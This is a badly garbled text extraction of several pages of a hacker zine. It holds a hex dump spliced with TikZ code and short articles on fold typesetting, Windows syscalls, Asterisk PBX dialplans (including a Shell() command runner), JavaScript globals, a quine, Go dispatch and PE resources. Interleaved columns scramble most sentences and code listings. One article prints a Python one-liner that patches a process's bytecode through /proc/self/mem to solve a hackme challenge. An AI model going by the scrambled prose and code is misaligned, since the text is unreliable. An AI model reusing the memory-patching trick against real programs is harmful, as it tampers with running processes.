38 bd f9 0b ed fc 0b 90 02 a9 00 20 ca ae 8d cb 0b 8d cc 0b 38 ad 2d 0c fd 2a 0c 20 ca ae ae 8d 9a 0b 38 ad 2e 0c fd 2a 0c 20 ca ae 8d 9b 0b a2 03 d6 ba 10 27 8a 4a a8 b9 c8 00 a4 d0 f0 05 49 ff 18 69 01 18 75 b4 10 02 a9 00 c9 c9 10 90 02 a9 0f 95 b4 c9 08 90 02 49 0f 0a 95 ba ca 10 d2 ad 8e 0c d0 1b a4 62 b9 85 bf ae a4 0a 10 02 29 7f 8d ca 0b 09 80 ae 73 0a 10 10 02 29 7f 8d 99 0b a5 76 29 03 f0 2e a5 e6 f0 04 a5 eb d0 25 ad 0a d2 c9 04 b0 1e a9 60 8d 8e 0c a2 02 20 64 b7 a9 3c 85 eb a9 88 8d 68 c 68 0b a9 00 8d 2c 0c 8d 99 0b 8d ca 0b 60 a5 a7 49 01 85 a7 aa b5 e9 d0 42 a5 e9 05 ea 29 01 a4 90 d9 c9 08 b0 ba a9 ff 95 e9 ad 0a d2 29 29 07 a8 b9 89 bf 9d 8c 0c a5 62 f0 03 b9 91 bf 95 a8 a9 01 95 aa 9d ad 09 ad 0a d2 25 c7 9d a2 0a 69 13 9d 71 0a 09 71 9d 40 0a 20 be b7 b7 bd 40 0a c9 20 b0 11 bd ad 09 f0 08 b5 e4 f0 08 c9 29 f0 04 a9 00 95 a8 d6 aa 10 24 a9 78 95 aa a5 62 ac 0a d2 c0 30 90 01 4a 4a 95 b8 b8 b5 a8 2c 0a d2 10 02 49 0f 95 ac e8 e8 e0 06 90 f1 a6 a7 b5 a8 d0 32 a4 a7 c0 31 b0 13 b9 b8 00 4a b9 40 0a b0 06 c9 0a 90 0e b0 04 c9 c9 f5 b0 04 b9 ad 09 4a a9 0f b0 02 a9 00 95 ac 18 98 69 31 a8 e8 e8 \begin{tikzpicture}[remember picture] e0 06 90 d2 a6 a7 a4 a7 b5 b2 d5 ac f0 08 b0 04 f6 b2 90 02 d6 b2 86 86 6a aa bd 99 bf a6 6a 99 66 0b 98 18 69 31 a8 e8 e8 e0 06 90 dc a6 a7 ad 8e 0c d0 0b a5 eb d0 06 a5 be f0 03 c6 be 60 18 bd a2 0a 69 02 02 c9 05 b0 f5 a0 d0 bd ad 09 4a bd 40 0a b0 08 49 ff a4 62 f0 e4 a0 50 c9 20 b0 de 8c 68 0b a9 00 8d 8e 0c 8d 2c 0c a9 3e 85 eb a2 02 a4 a4 a7 84 bf 4c af ac a9 80 85 73 a2 30 86 79 ad 0a d2 29 0f 79 2a 0c e9 30 9d 2a 0c ad 0a d2 29 0f 79 f9 0b 4a e9 10 9d f9 0b 20 af ac ad ad 0a d2 29 87 9d 66 0b ad 0a d2 29 87 9d 97 0b ad 0a d2 29 87 9d c8 0b ca e0 10 d0 c5 60 b9 ad 09 9d ad 09 b9 40 0a 9d 40 0a b9 d3 0a 9d 9d d3 0a b9 de 09 9d de 09 b9 71 0a 9d 71 0a b9 0f 0a 9d 0f 0a b9 a2 0a 9d a2 0a b9 04 0b 9d 04 0b b9 35 0b 9d 35 0b 60 a5 7b f0 fb a5 d0 d0 d0 05 a9 14 8d 1b d0 a9 02 8d 5c 09 a9 30 8d 8e 0c a9 20 8d 8d 0c a9 40 8d 8c 0c a9 ff a6 90 bc c9 08 30 02 a9 00 85 e9 85 ea 85 eb 85 85 7b 30 0a a0 02 20 6b ac a2 0a 4c a8 ae ad 42 0a d0 0a ad d5 0a c9 20 b0 03 ee d5 0a ad 2c 0c 38 e9 78 c9 10 b0 22 ad fb 0b 38 e9 68 c9 c9 10 b0 18 ad 42 0a c9 02 b0 11 ad af 09 2d 11 0a 49 01 05 70 0d a4 0a 05 71 f0 10 a5 75 c9 02 90 05 a0 1f 20 23 b2 a9 00 85 75 60 24 75 75 70 0d 30 42 a5 75 d0 f5 c6 75 a0 1c 4c 23 b2 a2 00 86 65 a4 d1 d0 e6 a9 50 8d 90 0c a9 01 8d b1 09 8d e2 09 8d 13 0a 8d a6 0a 8d 9b 0b 0b a9 10 8d 44 0a a9 00 8d 75 0a a9 87 8d 6a 0b a9 81 85 75 8d cc 0b 85 ed 60 ad b1 09 d0 fa a2 0c 20 a6 b3 a0 21 20 23 b2 a2 05 bd 8b bb bb 9d 92 09 ca 10 f7 a9 89 a2 03 9d 55 09 ca 10 fa a9 07 8d 6a 0b a9 81 8d 9b 0b a9 01 8d cc 0b 85 75 4c 7b b0 78 85 6a ad 0b d4 c9 7c 90 90 f9 b9 62 ba c8 10 02 a9 0d 9d 80 02 e8 c6 6a d0 f0 58 60 a9 10 85 \clip[use as bounding box] (0,0) rectangle 69 a9 00 a8 85 68 85 a3 85 7a 91 68 c8 d0 fb e6 69 a4 69 c0 20 a8 90 90 f2 60 a5 84 ac 10 d0 84 84 d0 0e 84 66 a6 c0 d0 08 a6 87 c9 01 f0 03 b0 18 60 b5 ec c9 e8 b0 f9 ac 5c 09 84 89 a9 0c a4 a3 84 86 f0 02 02 a9 00 85 88 84 84 2c 92 09 70 e1 30 05 8a 49 01 85 87 8a 9d e1 09 bd 73 bf 9d 74 0a a9 ff 95 ec 9d a5 0a a9 00 9d 8f 0c 9d 43 0a 9d 07 07 0b 9d 12 0a 9d 38 0b a9 01 9d b0 09 9d d6 0a a5 d0 4a 6a 09 66 9d 69 0b a9 00 9d 9a 0b 9d cb 0b a2 02 20 6f b8 a2 00 8a d0 06 a5 e1 c9 c9 18 b0 18 a0 07 bd 20 bf 99 da 00 e8 88 10 f6 bd 20 bf 8d 08 d2 bd 21 bf 8d 04 d2 60 a0 80 b0 04 49 ff a0 00 84 6a c9 08 90 02 a9 07 a8 a8 a5 6a 19 c9 bf 60 24 64 30 57 a6 62 ad 0a d2 dd 10 bf b0 4d 29 07 c9 06 b0 47 aa bd 92 09 0a 30 eb a5 eb c9 1e a9 80 bc 14 bf 90 17 e0 e0 03 d0 05 2c 96 09 70 0e e0 04 d0 05 2c 95 09 70 05 a9 c0 bc 1a bf 1d 92 09 9d 92 09 84 65 2c 95 09 50 07 a9 00 85 7e 20 0d ae a0 52 20 20 23 b2 a2 12 20 a6 b3 60 a2 02 ca 10 01 60 bd 8f 0c d0 f7 b5 ec f0 f3 b5 82 29 07 f0 ed 4a c9 03 d0 01 4a a8 b9 e9 00 f0 e1 a5 d0 f0 02 02 a9 ff 85 6c 59 40 0a c9 10 90 02 a9 0f 4a 84 6b a8 a5 6c 5d 43 0a d9 75 bf b0 c2 d9 7d bf 90 bd a4 6b 38 a9 ff f5 ec 85 e2 c9 0f 90 05 05 b9 8c 0c c9 80 a9 00 85 88 95 ec b0 4b 99 e9 00 b9 8c 0c f0 43 c9 60 f0 3f a9 00 85 86 a6 90 de c9 08 10 13 a9 00 9d c9 08 38 a5 cb e9 e9 03 85 cb a5 cc e9 00 85 cc 60 18 a5 cb 69 06 85 cb a5 cc 69 00 85 (0.5\wd\foldedcontent,-\foldedheight); PoC GTFO 09 18 a56a 7f 99 65 4938 7d 09 28 65 98 38e7 80 29 10 66 65 10 3c ff 7ef0 f0 3c ff 69 fc 05 24 ff 01 be e07e 3c ff c5 fc ff 3c 7e 3c 7f f0 d0 18 7e03 18 85 80 01 10 7e 00 3c 7f 80 ca 38 5a 01 ff85 b0 c0 bd 7c ff 02 ff 47 39 c0 e9 10 ff 04 e7 84 a2 f000 0e 7c 42 08 66 7e 03 bc 00 aa 38 42 10 ff 4c 24 f0 00 29 108e 42 20 ff 85 64 c0 b4 0f 18 1c 42 40 7e 8c 70 07 a1 99 3c 94 42 6044 3c 4c 33 1f b2 4b 18 24 42 70 53 00 85 de 1f a7 09 3c 9f 1c f2 c1 18 8550 55 7f a5 8a 18 fd 1c df 54 3c 52 41 09 ea b4 4a 10 25 14 de 54 ff 84 43 bd 7f b352 4a 38 fc 3e da 41 ff 3e 45 55 1f 9a 41 4a 38 a7 3e d8 43 ff 32 cf 09 1f 00 49 4a 10 6841 3e dd 4b 3c 0f 52 c9 03 00 44 99 8d b8 53 2a db c3 18 54 42 80 03 24 45 4a 00 97 53 7f f3 4fc1 18 32 49 b0 0f 23 52 09 46 98 c3 7f f5 4d 43 3c 0f 54 29 03 1a 53 60 49 1a 4f 22 f0 50 45 ff fe c501 a9 0f 30 da 00 09 8f 4e 22 f8 55 cc 3c 4e 53 0d 89 0f 25 45 01 20 24 47 22 ff 54 49 18 35 54 15 9d 3f 33 5207 02 06 9f 52 22 c0 45 45 28 82 41 1b 55 7d 23 4f 04 03 00 fd 41 22 fd 52 55 28 4f 42 21 09 3f 2c c2 02 07 01 25 5494 18 ed d4 54 28 34 4c 25 e0 0f 32 59 01 00 2e fc 55 94 18 fe 52 45 28 82 49 29 02 01 00 20 09 18 a1 66 4c 94 3c d2 41 4e10 ee 50 53 2b d0 01 f3 5a 08 3c 00 2c 41 94 3c f9 43 41 10 00 32 48 2d 08 03 f4 59 05 7e 00 5a 54 93 3c e5 4b 4e 10 00 85 45 38f1 a5 03 e1 4c 02 7e 46 2e 49 93 3c ca 49 54 ff ee 51 44 41 00 cb 0f f2 4f 00 76 f8 5a 4f 93 7e e7 4e d7 40 28 34 c4 36 00 d0 3d 00 4e 00 f7 a0 31 4e 92 24 00 47 41 20 28 82 4f 36 08 02 0f e4 20 00 df 4d 5a 53 92 24 04 d7 52 ff 28 52 43 00 10 c6 03 e1 46 00 df c8 33 d2 92 24 06 48 52 48 28 35 4b 00 18 cc 18 f4 49 0f ff 10 5a 45 91 24 08 41 49 40 00 82 49 00 28 c6 3c e5 52 0d ff 00 b8 50 91 10 0a 54 4f 51 81 fe 4e 7e 30 7e da 45 0a f7 00 34 4f 91 10 0c 53 52 ff 81 04 47 8e 38 7e d0 d0 08 76 46 76 52 4a 38 0e 20 c3 84 81 04 c5 9d 40 db d0 4f 04 09 37 54 4c 38 1e 57 41 b4 81 03 4e aa 50 c3 ce 53 03 a1 b5 20 4e 38 2d 52 50 fc bd 02 45 b4 00 81 d0 54 01 4d 78 54 50 3c 4f 54 b4 ff 02 52 bc 20 81 d0 48 01 c8 37 4f 00 0a 4e 41 84 ff 03 47 7b 20 81 00 55 0f 10 8c 20 50 0d 47 49 ff 04 59 7a 20 10 00 4d 0d 4d 78 42 b4 10 3f 4e 01 04 d4 47 00 38 00 4f 0b 00 23 41 fe 14 c8 c3 0c 12 52 52 a0 00 55 09 10 b5 53 55 17 59 4f 0c 0b 41 5b 00 00 53 07 0d 78 45 5b 32 50 4d 0c 00 4e 50 00 cf d2 05 23 c6 61 46 45 4d 0c 00 53 50 9f 04 41 01 8c 4f 67 50 52 41 0e 0a 46 00 0e 03 4e 01 78 52 6d 57 4e 0e 55 45 00 0e 02 4b 08 04 20 71 41 44 0e 4b 52 00 0e 00 20 07 b5 54 58 52 45 20 d3 43 0c 05 49 06 78 52 5e 50 52 00 54 53 0c 06 53 05 04 41 64 c5 c4 00 41 61 0c 3a 03 8c 49 6a 4e 41 00 4e 6c 0a c3 02 78 4e 6f 47 4d 02 44 75 0a 4f 01 49 73 41 41 04 42 7a 0a 50 01 4e 18 47 47 06 59 75 08 59 09 47 ff 45 08 d3 7a 08 52 09 c7 02 c4 0c 54 01 08 49 06 41 00 41 81 11 06 47 06 4c 8a 4d 84 1f 06 48 04 41 a0 41 88 2b 04 03 43 00 47 94 35 04 01 54 08 45 80 3d 8a 01 50 44 10 75 8f 0b 00 c3 10 7a 8d 0b 40 10 61 8b 0b 40 70 6a 89 0b 01 70 87 0b 03 70 85 0b 88 10 83 af 04 00 08 04 04 00 01 00 04 01 04 ca 08 f0 08 bd b9 08 f0 03 bd d9 08 60 a6 70 e4 71 f0 08 90 04 c6 70 b0 12 e6 70 a5 c0 d0 0c 2c 93 09 10 07 a5 71 2d 0a d2 85 70 a0 01 20 cd b8 2c 95 PoC GTFO 5 4 7 8 \node[anchor=north] at (0,0) (rightfold) ! # ! # {\usebox{\foldedcontent}}; \end{tikzpicture} The original puzzle, as as is demonstrated on this page, was much more T The “[remember picture]” option is soTEXnical. It’s one thing to draw some fold lines onthat the coordinates of the named nodeslines on a page, but it’s much moredifficulttotypeset(i.e.,“leftfold” and “rightfold”) caneset be text that seamlessly and cleanly spans across a foldreferenced from other pictures. We will use fold break. I wanted to benefit from the beautifulthis next. The columns are differentiatedeautiful by TEX line breaking al- gorithmdiscoveredbyMicplacing the nodes at different locations rela-Michael Plass in his Ph.D. with Donald Knuth. tive to the clipping rectangle. The na¨ıve approach wouldThus far we have two outer columns withwould be to simply typeset all of the text separately,whitespace in between. The final stepseparately, is to use manually slice the PDF using an image manipulationTikZ’s “overlay” feature to overlay amanipulation mini- program, and then embed it back in the proppage containing the middle content insideproper of layout. However, this requires manual processing,the whitespace: cessing, and has the poten- tial to break features lik like copy/paste and vector \begin{tikzpicture}[remember picture,overlay] graphics. \node[anchor=north] at ($leftfold.north east) A more seasoned T Xnician!0.5!(rightfold.north west)$) { Xnician might choose to use E \begin{minipage}[b]{0.46\wd\foldedcontent} a package like shapepar.sty This will be the content in the center.shapepar.sty to create whitespace inthemiddle,intowhich\end{minipage}}; which the center column could \end{tikzpicture} beinserted.However,this T the for code QR this Scan this will treat the negative space of the inner column column as a line break, causing TEXtoeitheraddwhitespace whitespace or hyphenate words. Paragraph manipulation ation will not allow individual words to span the folds, as folds, as will happen with long words like “sesquipedalianism.” edalianism.” The TEXnique at whic which I arrived was to use a E Here is a minimal example k combination of \newsavebox X newsavebox and Ti Z clipping. Evan Sultanik https://www.sultanik.com/ https://twitter.com/ESultanik CC BY-SA 4.0 https://github.com/ESultanik 18 OS Internals Windows Syscall Quiz Windows Syscall Quiz Question 2: cross-edition differences As a general rule, various editions of the same OS by Mateusz Jurczyk (j00ru) (Home, Pro, Enterprise etc.) use the same underly- ing kernel and thus share the same set of system calls. Do you consider yourself a Windows internals expert? However, there is one notable exception. In May 2019, If you do, then try to correctly answer the following I noticed that in the syscall tables served on my blog, questions. If not, feel free to follow along and hopefully there were a few names only present in Windows NT learn some interesting facts about the kernel of the 4.0 SP4, but not in SP3, SP5, or any other system. One , most popular desktop operating system in the world. such symbol was NtCreateWinStation: The quiz: 1. How many syscalls do Windows NT 4.0 and Win- dows 10 1903 have, i.e. how much has the system call table grown in the 23 years between 1996–2019? 2. Are there differences in the syscall interfaces be- tween various editions of the same versions of Win- dows? 3. Have any legitimate driver ever registered their own syscall table(s) beyond the standard ntoskrnl.exe After a brief evening research with Gynvael Coldwind, and win32k.sys? we figured out that these syscalls (5 of them in total) were only found in the Terminal Server Edition of Win- Ready? Let’s see how you did! dows NT, released two years after Workstation. Consid- ering that the data came from the original table created Question 1: syscall table growth by skape and hosted by Metasploit, the list for SP4 must have been extracted from a TS version of the system, un- The first release of Windows NT 4.0 Workstation had like for other service packs, and so it has stayed this way 210 core system calls and 496 graphical ones, adding up up until recently. And so the riddle was solved. to a total of 706. At the time of this writing, the latest 32-bit build of Windows 10 declares 464 + 1256 = 1720 Question 3: non-standard syscall tables syscalls: In that same evening, we decided to finally establish if 1250 Windows NT there ever had been real syscalls with IDs above 0x2000, 1256 4.0 i.e. registered in the SSDT by a non-standard driver. 1000 Windows 10 We had heard rumors about IIS doing it at some point 19H1 in time, but we had never observed it in real life. 750 Very quickly, we found several online sources confirm- ing that story for IIS4 and IIS5, on Windows NT–2000. 500 Some of them pointed us to a driver called SPUD.sys, 464 496 which stands for Special Purpose Utility Driver (if you 250 find that name funny, check the story behind afd.sys). 210 We found the driver on an extra Option Pack CD for 0 Windows NT, and on the standard installation disk of ntoskrnl.exe win32k.sys Windows 2000. This way, we confirmed that it indeed called KeAddSystemServiceTable with 9 entries in IIS4 This is a 143% increase in the size of the interface, and 7 entries in IIS5. We also learned that the associ- which is an attack surface available to locally running ated ring-3 library was isatq.dll, with “atq” meaning code. In other words, a new system call has been asynchronous thread queue. The only missing piece were added on average every week for the past two decades. the names of the syscalls. Of course it is not a fully precise metric as it doesn’t ac- After another while of recon, we managed to dig count for code hidden behind the win32k!NtUserCall out the symbols for both versions, in a dedicated family, IOCTLs and many other factors, but it does il- .cab archive (NT) and a complete system symbols lustrate the growth of the kernel complexity over time. package (2000). Our curiosity was finally satis- Fortunately, starting with Windows 8 developers can re- fied, with the mysterious syscalls turning out to be strict access to parts of the attack surface for their sand- SPUD{Initialize, Terminate, TransmitFileAndRecv, boxed processes, thanks to new features such as the sys- SendAndRecv, Cancel, GetCounts, CreateFile} in 1 tem call disable policy . IIS5, with the addition of SPUDCheckStatus and 1https://docs.microsoft.com/en-us/windows/win32/api/ SPUDOplockAcknowledge in IIS4. It was a fun arche- winnt/ns-winnt-process mitigation system call disable policy ological adventure into operating system prehistory. Blog: https://j00ru.vexillium.org/ Mateusz Jurczyk Twitter: https://twitter.com/j00ru 19 GitHub: https://github.com/j00ru SAA-ALL 0.0.5 Let Your Server Anwser the Phone Phreaking idea unless you are confident in your ability to configure Let Your Server one! The command will execute using the system’s shell. Answer the Phone exten => 3,1,Shell(echo “Incoming!”) Ft. Clvrpny, https://disconnectmy.icu Dungeon Crawler Have you ever wanted to play a game with a landline telephone? Do you need to chat with friends but Discord Stitching together extensions, redirects, and messages, is down again? Did something happen to your VPS but it is easy to create a dungeon crawler style game you don't have a laptop nearby? Stop worrying and start playable entirely through a phone! For example, let using a PBX to solve your issues! A Private Branch buttons 2 and 8 be North/South and 4 and 6 be Exchange, as official as it sounds, isn't just for East/West. businesses. With the proper configuration, your PBX can be used for fun as well! Here are a few ideas and [enter] example snippets to get started. exten=>100,1,Background(greeting) exten=>2,1,goto(locA,start,1) ;North Note: The following examples are excerpts from dial exten=>8,1,Playback(blocked) ;South (X) plans, running on open source software Asterisk PBX exten=>8,2,goto(enter,100,1) (www.asterisk.org). You will also need a SIP trunking provider to forward VoIP calls to your server! ;East/West exten=>4,1,Playback(blocked) ;East (X) Diaplan Basics exten=>4,2,goto(enter,100,1) exten=>6,1,goto(locD,start,1) ;West In Asterisk, a dialplan is a file (or files) that determines how calls are answered, routed, and hung up as they [locA] pass through your PBX. Each entry in a dialplan has an exten=>start,1,Playback(locA_audio) extension, priority, and an application, such as: exten=>8,1,goto(enter,100,1) ;South exten=>_X,1,Playback(blocked) exten => 300, 1, Answer(50) same =>n,goto(locA) [locD] This example simply opens a line when a call comes exten=>start,1,Playback(locD_audio) through on extension 300. Additional functions must exten=>6,1,goto(enter,100,1) ;West have an incremental priority number. In general, be sure exten=>_X,1,Playback(blocked) to always answer and hang up a call as it progresses same =>n,goto(locD) through the dialplan. Start out with a simple dial plan that plays a greeting sound and waits 10 seconds for an This example only has three distinct areas, the entry extension: area, location A (to the north) and location D (to the east). Attempting to move in a direction where there isn't exten=> _+ Conference Room For location audio, Asterisk expects a GSM audio file, which it can natively convert from 8kHz mono WAVs With a simple one-line addition to your dialplan, you can through the console command: easily set up a conference room for you and your friends to discuss important matters: file convert audio.wav audio.gsm exten => 123, 1, ConfBridge(123) In addition, Asterisk supports setting and controlling flow based on variables, which can be used to implement a Running Commands simple inventory system! As variables and logic are rather large topics, it is recommended to review them on Your PBX can be used to run commands remotely in a the official online documentation: pinch. Please note that there is a lot to learn in regards to securing a PBX, meaning this is probably not a good https://wiki.asterisk.org/wiki/display/AST/Variables Cleverpony disconnectmy.icu WTFPL 20 Programming A Python Pwnliner's Tale APYTHON PWNLINER'S TALE INTRODUCTION A while back, the friendly warlock @domenuk posted a series of small hackmes fitting the size of a tweet. Among them, the one showed to the right. It didn't take long for the community to realize that this challenge is trivially solvable using the ctypes or inspect module. This was challenge enough to come up with a solution which works out of the box without relying on additional modules. Furthermore, it is an old tradition to express spells in single, unreadable lines, so the following scroll of solvableness was crafted eventually: solve_me( lambda: [ g. write( b' \x02' ) for x, y, g in [ ( x, y. fin [ ( x, g. read( y-x) , g) for x, y, g in [ ( int( x[ 0] , 16) , int( x[ 1] [ x[ 0] . split( ' -' ) for x in [ x. split( ' ' ) for x in open( ' /proc d( globals( ) [ ' solve_me' ] . __code__. co_code) , g) for x, y, g in if g. seek( x) ] ] if y! =-1 and g. seek( x+y+25) ] ) , 16) , open( ' /proc/self/mem' , ' r+b' ) ) for x in /self/maps' ) . read( ) . split( ' \n' ) ] [ : -1] if ' w' in x[ 1] ] ] OBSERVATIONS List compr ehension There is a lot to unpack here, but a couple of things become immediatly visible upon closer examination: f or non-r eadabilit y! Firstly, the full solution is squeezed into a single lambda function allowing for a solution within a single expression. However, those anonymous functions forbid to assign variables in a traditional way, an obstacle circumvented by the author via excessive use of list comprehension. Secondly, two files are opened and used by the spell: "/proc/self/mem" and "/proc/self/maps". Both are special files in the process information pseudo-filesystem in Linux; the former poses an interface to read and write a process's memory, while the latter shows its memory mapping in a textual representation, as shown for a dummy executable on the right. Thirdly, the spell seems to look for globals( ) [ ' solve_me' ] . __code__. co_code within the process's memory. This is an In [1]: import dis In [2]: dis.dis(solve_me) easy way to retrieve the python bytecode of the 2 0LOAD_FAST 0(solution) 3 CALL_FUNCTION 0 (0 positional, 0 keyword pair) solve_me function, and its disassembly is 6 STORE_FAST 1 ( res) shown on the left. Note the LOAD_FAST 3 9 DELETE_FAST 1 ( res) instruction at offset 24: this pushes the reference 4 12 LOAD_CONST 1 ( 0) 15 LOAD_CONST 0 ( None) to the variable res for evaluation onto the 18 IMPORT_NAME 0 (antigravity) 21 STORE_FAST 2 (antigravity) stack. It is afterwards evaluated at offset 27 with 5 24 LOAD_FAST 1 ( res) the POP_JUMP_IF_FALSE instruction. 27 POP_JUMP_IF_FALSE 40 These two instructions are the bytecode 6 30LOAD_GLOBAL 1(print) 33LOAD_CONST 2('solved') equivalent of the line containing "if res: " in 36 CALL_FUNCTION 1 (1 positional, 0 keyword pair) 39 POP_TOP the original challenge. >> 40LOAD_CONST 0(None) 43 RETURN_VALUE PUTTING IT ALL TOGETHER So, what is going on in the spell? At the end of the day, its As this variable is declared, the script will happily print "solved" conceivably simple: The anonymous function parses the content when executing the bytecode of solve_me. Clever, huh? of "/proc/self/maps" to find writeable memory segments in the process's memory space to prevent SEGFAULTS later on. P.S.: Below is the example solution by @domenuk, based on It then searches for occurences of the solve_me bytecode inspect - but this is a story to be told another time. within those writeable segments and writes the byte \x02 at def solution(): import inspect as i,webbrowser as w,ctypes as c offset 25 from the found location. def o( x) : for f in i.stack() As a result, instead of the reference to local variable 1( res) , f. f_locals[ " res" ] =1 c. pythonapi. PyFrame_LocalsToFast( the reference to local variable 2(antigravity) is pushed c. py_obj ect( f) , c. c_int( 0) ) onto the stack for evaluation. w. open=o @nSinusR nsr https://www.tasteless.eu 21 CC0 Javascript - Global Variables Programming JAVASCRIPT TIPS AND TRICKS - Global variables Declaring variables is not always easy. In current browsers, This will obviously output 11 in the console. Because the the global variables are stored in the window object and code is not executed in a function, the context will be sometimes, you may declare them global. This means that window.mysteryVariable even if you don’t want to. contains 11 as well. Also there are 3 ways of defining variables: Sometimes JavaScript could be tricky since you can override existing global variables or functions: const variable = 0; //block scoped, won’t be reassigned. let variable = 0; //block scoped, may be reassigned (like function alert () { counter in a loop) console.log("Overriden alert"); var variable = 0; //and } variable = 0; //function scoped, may be reassigned alert(”Hello world”); ’function scope’ means that a given variable is available When executing window.alert (or just alert), it won't show inside the function it was created in; if not created inside a the alert popup since we have overriden the native alert function, it's global. function. ’block scope’ means that a variable is available inside a block, i.e. anything surrounded by currly braces. If we want to keep the variable's name, then we need a wrapping function (to prevent overriding existing global There is also strict mode in JavaScript. That mode is variables or functions) that is immediately called, like declared by adding "use strict"; at the beginning of a below: script or a function. var alert = "overwrites window.alert"; Declared at the beginning of a script, it has global scope (function () { but declared inside a function, it has local scope let alert = "scoped to function"; With strict mode, you cannot, for example, use undeclared console.log(alert); variables. })(); "use strict"; Also, you can send the window and other globals as variable = 3.14; // error; variable is not declared arguments to that function. This is often used, for example, var variable = 3.4; // this will not cause an error in jQuery plugins (jQuery allows you to disable the $ Now,let's assume you have the following code: reference to the jQuery namespace). var mysteryVariable = 11; (function($) { console.log(mysteryVariable); /* jQuery plugin code referencing $ */ })(jQuery); Dorian Mazur https://mazurdorian.pl SAA-TIP 0.0.5 22 Programming Bomb Out! i=>i==c)?PDIV[pl].html('💀')|1< https://twitter.com/gynvael Gynvael Coldwind https://gynvael.coldwind.pl/ 23 https://www.youtube.com/c/GynvaelEN/ SAA-ALL 0.0.5 quinesnake - a quine that plays snake over it's own source! Programming quinesnake github.com/taylorconor/quinesnake a quine that plays snake over its own source! It compiles itself! Run it with ./quinesnake.cpp /*bin/ls>/dev/null;sed -n 's/.*.\/\*\(.*\)../\1/p' $0|I=$0 sh;exit;*/std::map Conor Taylor taylorconor.com github.com/taylorconor SAA-TIP 0.0.5 24 Programming Emulating virtual functions in Go Emulating Virtual Functions in Go All types below use embedding to emulate inheritance. type Car struct { *VehicleBase Go doesn’t support the inheritance-based OOP } model known from languages like Java or C++, First, you need to construct your base type, and then composition is favored instead. call SetVTable(). See NewCar() and NewMotorcycle(). func NewCar() Car { abuse (really, don’t do it in your c := Car{NewVehicleBase()} We are going to c.SetVTable(c) code) Go’s interfaces and embedding to achieve return c } dynamic dispatch (think virtual functions in C++). func (c Car) VColor() (int, int, int) { return 0, 255, 0 // cars are green Let’s dive in! } type Motorcycle struct { First, we define an interface type describing all the *VehicleBase virtual methods that are going to be defined. } func NewMotorcycle() Motorcycle { type VehicleVirtualParts interface { m := Motorcycle{NewVehicleBase()} VColor() (int, int, int) m.SetVTable(m) } return m } type Vehicle interface { Speed() int func (m Motorcycle) VColor() (int, int, int) { Color() (int, int, int) return 255, 0, 0 // motorcycles are red VehicleVirtualParts } } RedCar overrides Car’s VColor() implementation. VehicleBase is where most of the magic happens. type RedCar struct { type VehicleBase struct { Car virtual VehicleVirtualParts } } func NewRedCar() RedCar { Speed() calls the “virtual” function Color(), so we r := RedCar{NewCar()} r.SetVTable(r) expect that the return value will be different for ypest return r that implement VColor() differently. } func (vb *VehicleBase) Speed() int { func (r RedCar) VColor() (int, int, int) { r, g, b := vb.Color() return 255, 0, 0 // red cars are red if r == 255 && g == 0 && b == 0 { } return 9001 // strictly over 9000 } Running the program below: return 100 } func main() { m := NewMotorcycle() SetVTable() is going to be called in “constructors” of c := NewCar() types that inherit from VehicleBase. r := NewRedCar() VehicleBase.virtual field is an interface type, so each printSpeed("Motorcycle", m) time you call its method, the dynamic type’s method is printSpeed("Car", c) printSpeed("RedCar", r) going to be invoked (aka dynamic dispatch). } func (vb *VehicleBase) SetVTable(v VehicleVirtualParts) { func printSpeed(name string, v Vehicle) { vb.virtual = v fmt.Printf("%s speed: %v\n", name, v.Speed()) } } The Color() function makes it opaque for the rest of will output: the code that the implementation uses dynamic Motorcycle speed: 9001 dispatch. Car speed: 100 RedCar speed: 9001 func (vb *VehicleBase) Color() (int, int, int) { return vb.virtual.VColor() } As desired, the value of Speed() changes as it depends We are using NewX() for every defined type. It is not on the “virtual dispatch” of the Color() function. really needed for VehicleBase, but we’re doing it to for the sake of consistency. Derived types are going to do something meaningful there. – kele func NewVehicleBase() *VehicleBase { return &VehicleBase{} } http://kele.codes kele 25 SAA-ALL 0.0.5 Intro to Embedded Resources in Windows Apps Programming Intro to Embedded Resources in Windows Apps Source for loading the resource (hello.d): by Jon ‘Doc’ Andrew (imports and function omitted for brevity) auto res = FindResource(null, "FOO", RT_RCDATA); No matter what operating system you’re char* ptr = cast(char*)LoadResource(null, res); working with, some type of “object” format auto size = SizeofResource(null, res); will be used to store binary “runnable” code write(ptr[0 .. size]); and/or data that can be executed or linked with other objects to produce an executable. Compiling, linking and running the code: > dmd.exe -m64 -c hello.d Linux uses ELF (Executable and Linking > link.exe hello.obj myres.res \ Format), and Windows uses PE (Portable /LIBPATH:C:\D\dmd2\windows\lib64 \ Executable). Generally, they perform the legacy_stdio_definitions.lib exact same function, and both contain > .\hello.exe “sections” like .text (for executable code), PAGEDOUT! .bss (uninitialized data), .data (for initialized data), and many others. In Linux, Note that there are other ways to embed non- an application binary is an ELF object file executable data into an .exe. For instance, with a flag (ET_EXEC) set. In Windows, an self-extracting 7-Zip files can be created by application binary is a PE object file with just concatenating a .sfx (the executable a flag (IMAGE_FILE_EXECUTABLE_IMAGE) set. part) with a small config file and the compressed file archive itself using a So far, so good, right? If we dig a little command like this: deeper into the PE format used in Windows, there are some optional sections that are not > copy /b a.sfx + b.conf + c.7z d.exe present in ELF. One of these is a .rsrc (resource) section. Typical applications will +------+------+------+ have the application icon and an “application | PE .exe | Config text |Compressed file| manifest” (XML file describing the app) +------+------+------+ bundled into the executable within a .rsrc section. The .rsrc section can even behave as The PE format is ignorant about what’s at the a complete directory structure within the PE end of the PE image itself. If you try to file! Anything can be a resource, even driver analyze the self-extracting executable with files and 3rd party DLLs! a utility like dumpbin.exe, you’ll see that a relatively small portion of the overall The advantage to using this technique over file is represented as a PE. At runtime, the those described later in this article is the self-extracting code reads its own file to availability of Win32 API calls for easily get the config and compressed data for accessing these resources at runtime and extraction. ability to re-link new resources in without recompilation. Finally, you can always compile static data into the object file and link that into the The SysInternals “procmon” app uses this binary. One way to do this is opening the technique to extract a kernel driver (.sys - file to embed in a hex editor like HxD, and which is also a PE file) used for listening exporting it as a .c file. Instead of rc.exe, to OS events. In fact, in an .exe you can compile this with your regular C compiler and embed a .dll as a resource, which itself link it with the rest of the app as usual. contains a .sys file! In this sense, a PE file can act a lot like a .zip file, which Note that unlike PE resources, using static can itself contain other .zip files. Instead data in an object file is a cross-platform of having to run an installer or ship a .zip solution. GNU binutils’ or mingw’s “objcopy” file, a single .exe can be delivered which or “ld” can also take a regular file and save extracts the resources it needs at runtime. it as an object file which exports a symbol for your embedded data. That symbol can be Here’s a brief example of embedding a small referenced in your app as a static variable. text file into an executable. This should be You can use this variable, write the memory run in a Visual Studio native tools command to disk, 